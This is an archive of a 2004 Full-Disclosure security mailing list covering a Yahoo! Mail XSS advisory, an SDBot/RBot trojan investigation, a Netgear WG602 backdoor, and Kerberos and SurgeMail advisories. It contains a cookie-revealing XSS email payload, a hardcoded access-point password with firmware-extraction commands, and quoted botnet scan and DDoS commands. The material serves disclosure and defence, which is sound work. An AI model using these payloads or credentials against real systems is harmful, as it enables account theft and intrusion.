hotmail (Probably because everyone is trying to find holes all the time). I bet this is still just the tip of the iceberg for yahoo, keep up the good work. Oh, here's one I found long time ago (yahoo), they probably fixed it by now, but I haven't checked: BTW. Long time no advisory, guys. I thought you had quit... What have you been up to ? Cheers, SkyLined ----- Original Message ----- From: "GreyMagic Software" To: Sent: Thursday, June 03, 2004 15:52 Subject: [Full-Disclosure] Simple Yahoo! Mail Cross-Site Scripting (GM#006-MC) > GreyMagic Security Advisory GM#006-MC > ===================================== > > GreyMagic Software, 03 Jun 2004. > > Available in HTML format at > http://www.greymagic.com/security/advisories/gm006-mc/. > > Topic: Simple Yahoo! Mail Cross-Site Scripting. > > Discovery date: 16 May 2004. > > Affected applications: > ====================== > > * Yahoo! web-based email service. > > > Introduction: > ============= > > Web-based email services and Yahoo! specifically make tremendous efforts to > sanitize incoming emails from potentially unsafe HTML content. Flawed > filtering of such unsafe content may result in severe consequences that > would occur as soon as a user opens an email for reading, including: > > * Theft of login and password. > * Content disclosure of any email in the mailbox. > * Automatically send emails from the mailbox. > * Exploitation of known vulnerabilities in the browser to access the user's > file system and eventually take over the machine. > * Distribution of a web-based email worm. > * Disclosure of all contacts within the address book. > > > Discussion: > =========== > > GreyMagic discovered that by sending a maliciously formed email to a Yahoo > user it is possible to circumvent the filter and execute script in the > context of a logged-in Yahoo! user. > > A known Cross-Site Scripting weakness is using entities instead of actual > chars, for example: "javascript:alert()". There is also a variation of > that weakness, caused by the way browsers ignore white-space chars in URLs: > "java script:alert()". Yahoo! properly filters both of these scenarios. > > However, a third variation remains unfiltered. It is possible to embed a > javascript URL by using a white-space entity with multiple zero chars in > front of it: "java script:alert()". > > > Exploit: > ======== > > The following HTML embedded in an email would show a Yahoo! user's cookie > when opened: > >

style="background-image:url(jav ascript:alert(document.cookie))">Hel > lo!

> > > Solution: > ========= > > GreyMagic informed Yahoo! of the vulnerability on 20-May-2004. Yahoo! > responded promptly and reported that it patched the vulnerability on > 24-May-2004. > > > Tested on: > ========== > > Yahoo! web-based email service. > > > Disclaimer: > =========== > > The information in this advisory and any of its demonstrations is provided > "as is" without warranty of any kind. > > GreyMagic Software is not liable for any direct or indirect damages caused > as a result of using the information or demonstrations provided in any part > of this advisory. > > - Copyright ? 2004 GreyMagic Software. > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.netsys.com/full-disclosure-charter.html From fulldisc at sun.consumer.org.il Thu Jun 3 15:35:22 2004 From: fulldisc at sun.consumer.org.il (Shachar Shemesh) Date: Thu, 03 Jun 2004 17:35:22 +0300 Subject: [Full-Disclosure] Strange TCP/IP DNS traffic Message-ID: <40BF372A.2040505@sun.consumer.org.il> Hi all, A few days ago I started seeing outbound TCP connection on port 53, aimed at the .com NS servers. These were blocked by the firewall. I realize that this does not violate any RFC, but it's still unusual. The outbound traffic is not generated by the local bind installation, which was asked to bind to port 53 for outbound traffic. Also, /etc/resolv.conf lists 127.0.0.1 as the nameserver, so as far as I understand such traffic should not be initiated by user programs. Anyone has any idea what that may be? Shachar -- Shachar Shemesh Lingnu Open Source Consulting http://www.lingnu.com/ From nils at druecke.strg-alt-entf.org Thu Jun 3 16:29:25 2004 From: nils at druecke.strg-alt-entf.org (Nils Ketelsen) Date: Thu, 3 Jun 2004 11:29:25 -0400 Subject: [Full-Disclosure] Strange TCP/IP DNS traffic In-Reply-To: <40BF372A.2040505@sun.consumer.org.il> References: <40BF372A.2040505@sun.consumer.org.il> Message-ID: <20040603152925.GA12352@bug> On Thu, Jun 03, 2004 at 05:35:22PM +0300, Shachar Shemesh wrote: > The outbound traffic is not generated by the local bind installation, > which was asked to bind to port 53 for outbound traffic. Also, > /etc/resolv.conf lists 127.0.0.1 as the nameserver, so as far as I > understand such traffic should not be initiated by user programs. > > Anyone has any idea what that may be? Easiest guess: Some user doing an host or nslookup or something, by hand choosing to send it to the nameserver the packets are targeted to. Something like "host -t ns microsoft.com H.GTLD-SERVERS.NET" Or some stupid application not using the gethostbyname systemcall but rather implementing it itself. There are some people out there believing they can do it better than the system call. Most of them screwed it up. Nils -- Nils Ketelsen // Mississauga, Canada 43? 35' 13"N, 79? 38' 23"W mailto:`#!/bin/sh`@druecke.strg-alt.entf.org http://druecke.strg-alt-entf.org/ From full-disclosure at nym.hush.com Thu Jun 3 16:49:23 2004 From: full-disclosure at nym.hush.com (full-disclosure at nym.hush.com) Date: Thu, 3 Jun 2004 08:49:23 -0700 Subject: [Full-Disclosure] Strange TCP/IP DNS traffic Message-ID: <200406031549.i53FnO46016148@mailserver3.hushmail.com> > Also, /etc/resolv.conf lists 127.0.0.1 as the nameserver, so > as far as I understand such traffic should not be initiated > by user programs. It sounds like named is running on your computer. Depending on your OS, netstat -anp might show you which application initiated the requests. From list at rachinsky.de Thu Jun 3 17:06:40 2004 From: list at rachinsky.de (Nicolas Rachinsky) Date: Thu, 3 Jun 2004 18:06:40 +0200 Subject: [Full-Disclosure] Strange TCP/IP DNS traffic In-Reply-To: <40BF372A.2040505@sun.consumer.org.il> References: <40BF372A.2040505@sun.consumer.org.il> Message-ID: <20040603160640.GA58170@pc5.i.0x5.de> * Shachar Shemesh [2004-06-03 17:35 +0300]: > The outbound traffic is not generated by the local bind installation, > which was asked to bind to port 53 for outbound traffic. Also, man named.conf: Query Address If the server doesn't know the answer to a question, it will query other nameservers. query-source specifies the address and port used for such queries. If address is * or is omitted, a wildcard IP address ( INADDR_ANY) will be used. If port is * or is omitted, a random unprivi- leged port will be used. The default is query-source address * port *; Note: query-source currently applies only to UDP queries; TCP queries always use a wildcard IP address and a random unprivileged port. From fulldis at frenchfries.net Thu Jun 3 17:11:59 2004 From: fulldis at frenchfries.net (fulldis at frenchfries.net) Date: Thu, 3 Jun 2004 09:11:59 -0700 (PDT) Subject: [Full-Disclosure] Format String Vulnerability in Tripwire In-Reply-To: <20040602234116.9A3674A5B@frenchfries.net> References: <20040602234116.9A3674A5B@frenchfries.net> Message-ID: <20040603161159.C86804A72@frenchfries.net> On Wed, 2 Jun 2004, Paul Herman wrote: > VERSIONS AFFECTED > ----------------- > Tripwire commercial versions <= 2.4 > [...] Typo. That should be '4.2' and not '2.4'. -Paul. From clarke at craftedpackets.net Thu Jun 3 17:24:33 2004 From: clarke at craftedpackets.net (clarke at craftedpackets.net) Date: Thu, 3 Jun 2004 12:24:33 -0400 Subject: [Full-Disclosure] Using Xbox live for covert communication Message-ID: <200406031624.BQF64929@ms2.netsolmail.com> Recently, I subscribed to Xbox live. After playing on some of the games online, I thought that this is a perfect place for covert communication. There rooms aren't monitored. You can open up private rooms and communicate with invited friends. Who knows... :-) From 1 at malware.com Thu Jun 3 17:28:39 2004 From: 1 at malware.com (http-equiv@excite.com) Date: Thu, 3 Jun 2004 16:28:39 -0000 Subject: [Full-Disclosure] TREND MICRO: The Protector Becomes The Vector [technical exercise: cross-application-scripting] Message-ID: <200406031628.i53GSdc0023610@web120.megawebservers.com> Thursday, June 03, 2004 The following represents an interesting technical examination when the so-called "Anti-Virus" protector becomes the Virus "Vector". Naturally this is the result of relying on the "plug and play" or "module" of one Internet Explorer browser and operating system from a product "innovator" called Microsoft. Trend Micro [ http://www.trendmicro.com ], a purveyor of gadgetry designed to 'protect' the little people on the Information Super Highway from a seemingly endless stream of traffic of obstacles collectively known as "malware", has a very nice little apparatus to achieve this. The "Trend Micro Internet Security model no. 1120 1311 engine version: 7.100" with all the bells and whistles. Lengthy examination confirms that it does its job and it does its job quite well. However: For whatever inexplicable reason, it [and perhaps others] relies on the time-tested insecure device known as the Microsoft Internet Explorer. It uses this incredible derelict 'thing' to generate its reports; that is when the "Anti-Virus" gadget encounters an opponent, the "malware" of the day, it alerts and indicates precisely what the problem is. Sounds Good: Knowing what it uses and where it uses it, we then have to work backwards and devise a method to 'cross-application-scripting' our arbitrary code into the device in order to coax it to do our work for us. Specifically: 1. When the product alerts it creates an html file in the temporary file of the user's machine [the so-called "local zone"] [screen shot: http://www.malware.com/weallcar.png 29KB ] This html file is viewed from an Internet Explorer "browser object" and indicates what file is problematic. 2. Technically [so far] in order to make use of all of this we need to name our problematic file a suitable name with suitable html tags to render as we require. At present the actual browser and operating system automatically filter this { http://x.x.x.x:7080/ ================ snip ======================== SOLUTION ======== Vendor contacted May 16, 2003 support-surgemail at netwinsite.com Vendor acknowlegement recieved May 17, 2003 Vendor Patch / Version 2.0c released June 2, 2004 and may be obtained at ftp://ftp.netwinsite.com/pub/surgemail/beta http://www.netwinsite.com/surgemail/help/updates.htm PROOF OF CONCEPT ================ ( see DETAILS ) CREDITS ======= This vulnerability was discovered and researched by Donnie Werner of exploitlabs mail: morning_wood at exploitlabs.com -- web: http://exploitlabs.com web: http://zone-h.org ref: http://zone-h.org/en/advisories/read/id=4714/ ref: http://exploitlabs.com/files/advisories/EXPL-A-2004-002-surgmail.txt From PerrymonJ at bek.com Thu Jun 3 20:45:11 2004 From: PerrymonJ at bek.com (Perrymon, Josh L.) Date: Thu, 3 Jun 2004 14:45:11 -0500 Subject: [Full-Disclosure] anyone seen this worm/trojan before? Message-ID: <5E1F351F4AE1D611A7FE00B0D0AB064A02353292@is6b> I read the link below and noticed that this worm must be a variant because the .exe is not the same and I don't notice and means of network scanning of propagation. JP -----Original Message----- From: Harlan Carvey [mailto:keydet89 at yahoo.com] Sent: Thursday, June 03, 2004 2:25 PM To: full-disclosure at netsys.com Cc: Perrymon, Josh L. Subject: Re: [Full-Disclosure] anyone seen this worm/trojan before? Josh, I tried to download the archive, and McAfee alerted me to "W32/Sdbot.worm.gen.g". From: http://www.sophos.com/virusinfo/analyses/w32sdbotcf.html "W32/SdBot-CF spreads to other computers on the local network protected by weak passwords." > I found this worm/ trojan on a laptop. Ran FPort and > found the .exe. I checked out your web site...don't you think that the information you found via fport would be useful to others, such as the port, etc? > Doesn't look like it propagates to other machines > but rather communicates > with a compromised > web companies server using IRC. The compromised > server has removed the IRC > service. Only sends RST packets back. > > I put it on my site. > > http://www.packetfocus.com/analysis.htm > > I would like to know the attack vectors. I'm > guessing LSASS. From etomcat at freemail.hu Thu Jun 3 21:02:04 2004 From: etomcat at freemail.hu (Feher Tamas) Date: Thu, 3 Jun 2004 22:02:04 +0200 (CEST) Subject: [Full-Disclosure] Re: anyone seen this worm/trojan before? Message-ID: Hello, >http://www.packetfocus.com/analysis/wkssvrs.zip Kaspersky AV says: "Backdoor.RBot.gen" malware Virus description: "http://uk.trendmicro- europe.com/enterprise/security_info/ve_detail.php? id=59366&VName=BKDR_RBOT.A" Try the above URL with RBOT_n (n = B,C,D,E, etc.) ending for more variants. The fact that it is identified as "something.GEN" means it is likely a new RBot variant, identified with antivirus heuristics. Sincerely: Tamas Feher. From PerrymonJ at bek.com Thu Jun 3 21:02:31 2004 From: PerrymonJ at bek.com (Perrymon, Josh L.) Date: Thu, 3 Jun 2004 15:02:31 -0500 Subject: [Full-Disclosure] anyone seen this worm/trojan before? Message-ID: <5E1F351F4AE1D611A7FE00B0D0AB064A02353295@is6b> After thinking about it and discussing with a friend- It makes sense that it doesn't try to propagate until it connects to an IRC server. That way you don't have a lot of machines hitting the compromised IRC server after it has been taken down. I'm working on setting up IRCD on my BSD box in my VMWARE lab and seeing what it does. I will also send the fport info. I *did notice the same ports open as the korgo worm. It also sends from sequential source ports to the IRC compromised host. JP -----Original Message----- From: Perrymon, Josh L. Sent: Thursday, June 03, 2004 2:41 PM To: 'insecure'; Perrymon, Josh L. Cc: full-disclosure at netsys.com Subject: RE: [Full-Disclosure] anyone seen this worm/trojan before? I was guessing about LSASS because that was the only patch not on the box that was infected. The user also had a pass with a couple #'s in it so I didn't think it would be found in a password list. After watching it in a while I *Never saw it try to propagate to another machine. That's what was weird. So how would be get it the first time? I had to infect him some way... But there where no other traces of it on the network... If I have some time I'll post the FPort data and some clean packet captures. JP -----Original Message----- From: insecure [mailto:insecure at ameritech.net] Sent: Thursday, June 03, 2004 2:27 PM To: Perrymon, Josh L. Cc: full-disclosure at netsys.com Subject: Re: [Full-Disclosure] anyone seen this worm/trojan before? Perrymon, Josh L. wrote: >I found this worm/ trojan on a laptop. Ran FPort and found the .exe. >Doesn't look like it propagates to other machines but rather communicates >with a compromised >web companies server using IRC. The compromised server has removed the IRC >service. Only sends RST packets back. > >I put it on my site. > >http://www.packetfocus.com/analysis.htm > >I would like to know the attack vectors. I'm guessing LSASS. > >Joshua Perrymon >PGP Fingerprint >51B8 01AC E58B 9BFE D57D 8EF6 C0B2 DECF EC20 6021 > > > McAfee VirusScan 7.1 with 4364 DAT detects it as W32/Sdbot.worm.gen.g. Other than that, they have no information besides that they first noticed it on 5/26/2004. It may spread through lsass, but this type of worm is usually limited to spreading through network shares with weak password protection. Jerry From lupe at lupe-christoph.de Thu Jun 3 23:03:13 2004 From: lupe at lupe-christoph.de (Lupe Christoph) Date: Fri, 4 Jun 2004 00:03:13 +0200 Subject: [Full-Disclosure] Re: Netgear WG602 Accesspoint vulnerability In-Reply-To: References: Message-ID: <20040603220313.GB2307@lupe-christoph.de> On Thursday, 2004-06-03 at 19:35:22 +0200, Tom Knienieder wrote: > Possibly vulnerable (not verified) > WG602 with other Firmware Versions > WG602v2 The WG602v2 uses different firmware. > Download the WG602 Version 1.5.67 firmware from Netgear > ( http://kbserver.netgear.com/support_details.asp?dnldID=366 ) WG602v2 Firmware Version 2.0RC5: http://kbserver.netgear.com/support_details.asp?dnldID=504 WG602v2 Repeater Firmware Version 3.2 RC6 http://kbserver.netgear.com/support_details.asp?dnldID=692 > and run the following shell commands on a UNIX box: > $ dd if=wg602_1.5.67_firmware.img bs=1 skip=425716 > rd.img.gz > $ zcat rd.img.gz | strings | grep -A5 -B5 5777364 2.0RC5 dd if=apfirmware_2.0rc5.img bs=1 skip=111596 of=rd.img.bz2 3.2 RC6 unzip wg602_v2_apfirmware_3.2rc6.zip dd if=apfirmware_3.2rc6.img bs=1 skip=112620 of=rd.img.bz2 In both cases this: bzcat rd.img.bz2 | strings | egrep 'Authorization|BASIC|super|5777364' Returns some garbage, but nothing similar to your output. Also logging in with super/5777364 does not work with my unit (unknown firmware release - I forgot the password and have to reset the unit. But it's getting a little late here.) HTH, Lupe Christoph -- | lupe at lupe-christoph.de | http://www.lupe-christoph.de/ | | "... putting a mail server on the Internet without filtering is like | | covering yourself with barbecue sauce and breaking into the Charity | | Home for Badgers with Rabies. Michael Lucas | From api at epost.de Thu Jun 3 23:08:23 2004 From: api at epost.de (Axel Pettinger) Date: Fri, 04 Jun 2004 00:08:23 +0200 Subject: [Full-Disclosure] anyone seen this worm/trojan before? References: <5E1F351F4AE1D611A7FE00B0D0AB064A0235328C@is6b> Message-ID: <40BFA157.74EA20E1@epost.de> "Perrymon, Josh L." wrote: > > I found this worm/ trojan on a laptop. Ran FPort and found the .exe. > Doesn't look like it propagates to other machines but rather communicates > with a compromised > web companies server using IRC. The compromised server has removed the IRC > service. Only sends RST packets back. > > I would like to know the attack vectors. I'm guessing LSASS. AntiVirus scanners identify our trojan as: BitDefender : Backdoor.SDBot.Gen Kaspersky : Backdoor.Rbot.gen McAfee : W32/Sdbot.worm.gen.g Symantec : W32.Spybot.Worm Trend Micro : WORM_SPYBOT.AP >From a quick look at the file I'd say the following is the best description of that trojan. There're several attack vectors ... http://www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=WORM_SPYBOT.AP&VSect=T Regards, Axel Pettinger From security at linux-mandrake.com Thu Jun 3 23:14:28 2004 From: security at linux-mandrake.com (Mandrake Linux Security Team) Date: 3 Jun 2004 22:14:28 -0000 Subject: [Full-Disclosure] MDKSA-2004:056 - Updated krb5 packages fix buffer overflow vulnerabilities Message-ID: <20040603221428.15419.qmail@updates.mandrakesoft.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandrakelinux Security Update Advisory _______________________________________________________________________ Package name: krb5 Advisory ID: MDKSA-2004:056 Date: June 3rd, 2004 Affected versions: 10.0, 9.1, 9.2, Corporate Server 2.1, Multi Network Firewall 8.2 ______________________________________________________________________ Problem Description: Multiple buffer overflows exist in the krb5_aname_to_localname() library function that if exploited could lead to unauthorized root privileges. In order to exploit this flaw, an attacker must first successfully authenticate to a vulnerable service, which must be configured to enable the explicit mapping or rules-based mapping functionality of krb5_aname_to_localname, which is not a default configuration. Mandrakesoft encourages all users to upgrade to these patched krb5 packages. _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0523 http://web.mit.edu/kerberos/advisories/MITKRB5-SA-2004-001-an_to_ln.txt ______________________________________________________________________ Updated Packages: Mandrakelinux 10.0: 3f69e19bae9dc3cb4ee59ca7d3be08ab 10.0/RPMS/ftp-client-krb5-1.3-6.1.100mdk.i586.rpm 6a1a0859a8aab0c4d0658209cb1b7f5c 10.0/RPMS/ftp-server-krb5-1.3-6.1.100mdk.i586.rpm 83159f49c7f5c143c5b7498153ec79e4 10.0/RPMS/krb5-server-1.3-6.1.100mdk.i586.rpm 674d93d2240afb54f579920b69484b34 10.0/RPMS/krb5-workstation-1.3-6.1.100mdk.i586.rpm 5e132ecbce927441c7be8e6004080535 10.0/RPMS/libkrb51-1.3-6.1.100mdk.i586.rpm 957327bc8dbd9c7176ac875828e39816 10.0/RPMS/libkrb51-devel-1.3-6.1.100mdk.i586.rpm 68890f7386b9d33d85f5c8ca0f527410 10.0/RPMS/telnet-client-krb5-1.3-6.1.100mdk.i586.rpm 0b507f70e638c93fd0897ff4a0b56e61 10.0/RPMS/telnet-server-krb5-1.3-6.1.100mdk.i586.rpm 990f44e1171410a8a4ff6f9b64a310c7 10.0/SRPMS/krb5-1.3-6.1.100mdk.src.rpm Mandrakelinux 10.0/AMD64: 9c6e1a4aa3298fc26b743e89ba79fb50 amd64/10.0/RPMS/ftp-client-krb5-1.3-6.1.100mdk.amd64.rpm dd30b5dcc6d6eafb252bea319c47cd72 amd64/10.0/RPMS/ftp-server-krb5-1.3-6.1.100mdk.amd64.rpm be24d1822f4c56eb5d514eb7f4620e94 amd64/10.0/RPMS/krb5-server-1.3-6.1.100mdk.amd64.rpm 3315cd08b90a42876cb3fe0df8de7bc1 amd64/10.0/RPMS/krb5-workstation-1.3-6.1.100mdk.amd64.rpm 8003ae014ebe45ec26d332cec6a4e0d8 amd64/10.0/RPMS/lib64krb51-1.3-6.1.100mdk.amd64.rpm 5f45277c5f4979864a14753208762e29 amd64/10.0/RPMS/lib64krb51-devel-1.3-6.1.100mdk.amd64.rpm 3284ca83d423ad7cf00e9f6d7a6eb19f amd64/10.0/RPMS/telnet-client-krb5-1.3-6.1.100mdk.amd64.rpm 963ad02887f98e59894e913f872eb623 amd64/10.0/RPMS/telnet-server-krb5-1.3-6.1.100mdk.amd64.rpm 990f44e1171410a8a4ff6f9b64a310c7 amd64/10.0/SRPMS/krb5-1.3-6.1.100mdk.src.rpm Corporate Server 2.1: 28d17e73c658b4633dfb80dc5f9e79d0 corporate/2.1/RPMS/ftp-client-krb5-1.2.5-1.5.C21mdk.i586.rpm 6d3252882a56eedcf4c1d65d5187da65 corporate/2.1/RPMS/ftp-server-krb5-1.2.5-1.5.C21mdk.i586.rpm 392cf7a12b155a7e38a1fcbf57356453 corporate/2.1/RPMS/krb5-devel-1.2.5-1.5.C21mdk.i586.rpm 4c208f2cc19e6ceb06e7748e3589c6ac corporate/2.1/RPMS/krb5-libs-1.2.5-1.5.C21mdk.i586.rpm 4f2574763f5cbc40b43e988016fa7ad5 corporate/2.1/RPMS/krb5-server-1.2.5-1.5.C21mdk.i586.rpm 3c13190ff1dab8751b49d5c3c9588681 corporate/2.1/RPMS/krb5-workstation-1.2.5-1.5.C21mdk.i586.rpm 0c048f9883ce94c1f677fcbfb61496dc corporate/2.1/RPMS/telnet-client-krb5-1.2.5-1.5.C21mdk.i586.rpm 0d44ecccb454ade87808de678b060834 corporate/2.1/RPMS/telnet-server-krb5-1.2.5-1.5.C21mdk.i586.rpm 219e71f13c936d8d5f7cd14513dcb751 corporate/2.1/SRPMS/krb5-1.2.5-1.5.C21mdk.src.rpm Corporate Server 2.1/x86_64: eab4f9bd5751049040cd9c9bd7492b08 x86_64/corporate/2.1/RPMS/ftp-client-krb5-1.2.5-1.5.C21mdk.x86_64.rpm a36e3184a7130674020db161a03dc705 x86_64/corporate/2.1/RPMS/ftp-server-krb5-1.2.5-1.5.C21mdk.x86_64.rpm 22322929f255095b2d5f54d338ede660 x86_64/corporate/2.1/RPMS/krb5-devel-1.2.5-1.5.C21mdk.x86_64.rpm eb09e34102ea6a43b914dedbcd0da178 x86_64/corporate/2.1/RPMS/krb5-libs-1.2.5-1.5.C21mdk.x86_64.rpm 783c614ed1dbbd2405c2e1a70703fc16 x86_64/corporate/2.1/RPMS/krb5-server-1.2.5-1.5.C21mdk.x86_64.rpm de5a5456f79f795787c6e54a04b6c098 x86_64/corporate/2.1/RPMS/krb5-workstation-1.2.5-1.5.C21mdk.x86_64.rpm c6b5b17261c7bffb8c5cdad1fc42d099 x86_64/corporate/2.1/RPMS/telnet-client-krb5-1.2.5-1.5.C21mdk.x86_64.rpm 250efd6fd7498de490681f257414d312 x86_64/corporate/2.1/RPMS/telnet-server-krb5-1.2.5-1.5.C21mdk.x86_64.rpm 219e71f13c936d8d5f7cd14513dcb751 x86_64/corporate/2.1/SRPMS/krb5-1.2.5-1.5.C21mdk.src.rpm Mandrakelinux 9.1: 2ced4496f263fced47a1507a82c2cb1e 9.1/RPMS/ftp-client-krb5-1.2.7-1.2.91mdk.i586.rpm cab37c9cf0b43e7b6686d7d52246fb38 9.1/RPMS/ftp-server-krb5-1.2.7-1.2.91mdk.i586.rpm 85f06e28d5866ca0019331f06128b9d9 9.1/RPMS/krb5-devel-1.2.7-1.2.91mdk.i586.rpm 7e5fdb86010a2beaca1096d7f5c5a9ec 9.1/RPMS/krb5-libs-1.2.7-1.2.91mdk.i586.rpm a6262aca95a4dc7bfbea9b39cad4297e 9.1/RPMS/krb5-server-1.2.7-1.2.91mdk.i586.rpm fee32c38e1c94a2b3d951b9eb2c22dae 9.1/RPMS/krb5-workstation-1.2.7-1.2.91mdk.i586.rpm 07bd644f73985078acae9e78b3efb570 9.1/RPMS/telnet-client-krb5-1.2.7-1.2.91mdk.i586.rpm 0288aecc76e64a0756d4c7c040859f5e 9.1/RPMS/telnet-server-krb5-1.2.7-1.2.91mdk.i586.rpm c9cb232771f711d8dacb9a0247f0f446 9.1/SRPMS/krb5-1.2.7-1.2.91mdk.src.rpm Mandrakelinux 9.1/PPC: c15b924256dd15bb6251bbd476fd7b89 ppc/9.1/RPMS/ftp-client-krb5-1.2.7-1.2.91mdk.ppc.rpm 0505bac3bc6cfc52d25313cd8ed74ef8 ppc/9.1/RPMS/ftp-server-krb5-1.2.7-1.2.91mdk.ppc.rpm 803f513a08883b41aae1e25121a180fc ppc/9.1/RPMS/krb5-devel-1.2.7-1.2.91mdk.ppc.rpm 5eb8abff903c9421b4c0e2e5f0a11273 ppc/9.1/RPMS/krb5-libs-1.2.7-1.2.91mdk.ppc.rpm cd82456b41b41cc34b0f49c5062273e5 ppc/9.1/RPMS/krb5-server-1.2.7-1.2.91mdk.ppc.rpm 085d8b51236fca2fda043f4d05ff91ea ppc/9.1/RPMS/krb5-workstation-1.2.7-1.2.91mdk.ppc.rpm 50bfa53e1d651b12e9c9896097eddbca ppc/9.1/RPMS/telnet-client-krb5-1.2.7-1.2.91mdk.ppc.rpm dfa7947c5210d71e2337a31efb55783c ppc/9.1/RPMS/telnet-server-krb5-1.2.7-1.2.91mdk.ppc.rpm c9cb232771f711d8dacb9a0247f0f446 ppc/9.1/SRPMS/krb5-1.2.7-1.2.91mdk.src.rpm Mandrakelinux 9.2: 3c0064e8fcddb7d92c417d2de44832e6 9.2/RPMS/ftp-client-krb5-1.3-3.1.92mdk.i586.rpm e8a49c0e3083aa62c78a166e13ad8de7 9.2/RPMS/ftp-server-krb5-1.3-3.1.92mdk.i586.rpm 684a31c9ad1b9cee39c354c24abd8c82 9.2/RPMS/krb5-server-1.3-3.1.92mdk.i586.rpm 9e2df5a8153c7f98252ba9ac8f328747 9.2/RPMS/krb5-workstation-1.3-3.1.92mdk.i586.rpm 36393ba65d19487fdddb561f3d410d34 9.2/RPMS/libkrb51-1.3-3.1.92mdk.i586.rpm 3ea03174e1b8d5034bcda9cff28ce46c 9.2/RPMS/libkrb51-devel-1.3-3.1.92mdk.i586.rpm 526f8a29e2f79646046f67f7e91de657 9.2/RPMS/telnet-client-krb5-1.3-3.1.92mdk.i586.rpm 0ee4ff655a48b36a3caf6b4fc9e58e7b 9.2/RPMS/telnet-server-krb5-1.3-3.1.92mdk.i586.rpm 97a04b5c44799791eb1574d72a77dd5a 9.2/SRPMS/krb5-1.3-3.1.92mdk.src.rpm Mandrakelinux 9.2/AMD64: dd21326a798dff0e4f18c98d1ee1b25b amd64/9.2/RPMS/ftp-client-krb5-1.3-3.1.92mdk.amd64.rpm 59e661a9d5e28a1662b4278b4099be3e amd64/9.2/RPMS/ftp-server-krb5-1.3-3.1.92mdk.amd64.rpm e1882034fd1c6a6956c1c36f044bd50a amd64/9.2/RPMS/krb5-server-1.3-3.1.92mdk.amd64.rpm cabea2b50a85c472ff5c252c4a3b65f5 amd64/9.2/RPMS/krb5-workstation-1.3-3.1.92mdk.amd64.rpm 5ebc0da84930676585725ddebc21ace3 amd64/9.2/RPMS/lib64krb51-1.3-3.1.92mdk.amd64.rpm 06f1e9bfe725e320666a51bd217b067b amd64/9.2/RPMS/lib64krb51-devel-1.3-3.1.92mdk.amd64.rpm 0c3c7637de54d9291c1886be3ac09ac1 amd64/9.2/RPMS/telnet-client-krb5-1.3-3.1.92mdk.amd64.rpm 876cd2e1bc605b8379183a5a7d53334f amd64/9.2/RPMS/telnet-server-krb5-1.3-3.1.92mdk.amd64.rpm 97a04b5c44799791eb1574d72a77dd5a amd64/9.2/SRPMS/krb5-1.3-3.1.92mdk.src.rpm Multi Network Firewall 8.2: e469005862622993d741efe18a973b4f mnf8.2/RPMS/krb5-libs-1.2.2-17.6.M82mdk.i586.rpm 007a6133daaec5e1c699ba303651f627 mnf8.2/SRPMS/krb5-1.2.2-17.6.M82mdk.src.rpm _______________________________________________________________________ To upgrade automatically use MandrakeUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandrakesoft for security. You can obtain the GPG public key of the Mandrakelinux Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandrakelinux at: http://www.mandrakesoft.com/security/advisories If you want to report vulnerabilities, please contact security_linux-mandrake.com Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Linux Mandrake Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.7 (GNU/Linux) iD8DBQFAv6LEmqjQ0CJFipgRAmP2AJ9yz70XbcN/fd6EjyQcyQbyoddqEACg59bD 1nsN3/ilgIlGelRpvf4eJqw= =EigO -----END PGP SIGNATURE----- From jim at becher.net Fri Jun 4 04:27:58 2004 From: jim at becher.net (Jim Becher) Date: Thu, 3 Jun 2004 22:27:58 -0500 Subject: [Full-Disclosure] anyone seen this worm/trojan before? In-Reply-To: <20040603192614.82582.qmail@web51510.mail.yahoo.com> Message-ID: I have seen a little of this worm/trojan as well... same IP, Unreal v3.2 IRC server. I am leaning to the same conclusion as Josh. Note: I said leaning, not completely convinced. I have seen in the IRC traffic some references to lsass, including what I think might be the command-line to instruct the infected machine to commence scanning -- "advscan lsass 100 5 1000 -b -r -s". Haven't had a chance to look at the executable with any detail yet... Also noticed this in the IRC traffic: "There are 1 users and 19496 invisible on 1 servers" and "ddos.random 10003 60 -s". I am not overly familar with IRC servers, so I am reviewing RFC2811 and Brocklesby's draft trying to understand the IRC traffic. We submitted our copy of wkssvrs.exe to Symantec, yesterday I believe. -bech -----Original Message----- From: full-disclosure-admin at lists.netsys.com [mailto:full-disclosure-admin at lists.netsys.com]On Behalf Of Harlan Carvey Sent: Thursday, June 03, 2004 2:26 PM To: full-disclosure at netsys.com Cc: Perrymon, Josh L. Subject: Re: [Full-Disclosure] anyone seen this worm/trojan before? Josh, > I would like to know the attack vectors. I'm > guessing LSASS. If you don't know what the worm is, what would lead you to guess that the infection vector is LSASS? Is there some other piece of information that you're not sharing? _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html From WEHNERPL at UCMAIL.UC.EDU Fri Jun 4 13:05:53 2004 From: WEHNERPL at UCMAIL.UC.EDU (Wehner, Paul (wehnerpl)) Date: Fri, 4 Jun 2004 08:05:53 -0400 Subject: [Full-Disclosure] Using Xbox live for covert communication Message-ID: <9BA6DCC15456CC46894E77233173DD7C157A3905@UCMAIL5> Then why not find a friend in germany and pretend to plan a biological attack? See how "un-monitored" and "private" it is then-:) -----Original Message----- From: clarke at craftedpackets.net [mailto:clarke at craftedpackets.net] Sent: Thursday, June 03, 2004 12:25 PM To: full-disclosure at netsys.com Subject: [Full-Disclosure] Using Xbox live for covert communication Recently, I subscribed to Xbox live. After playing on some of the games online, I thought that this is a perfect place for covert communication. There rooms aren't monitored. You can open up private rooms and communicate with invited friends. Who knows... :-) _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html From dave at immunitysec.com Fri Jun 4 15:03:18 2004 From: dave at immunitysec.com (Dave Aitel) Date: Fri, 04 Jun 2004 10:03:18 -0400 Subject: [Full-Disclosure] NYC Security Shindig Version 2 (with punch and pie!) Message-ID: <40C08126.3090507@immunitysec.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 New York City Security Shindig 2 Security Shindigs are ways for technical people in the Information Security industry to get together, view an informative technical presentation, and otherwise have a good time. Date/Time: Monday June 14th, 6pm 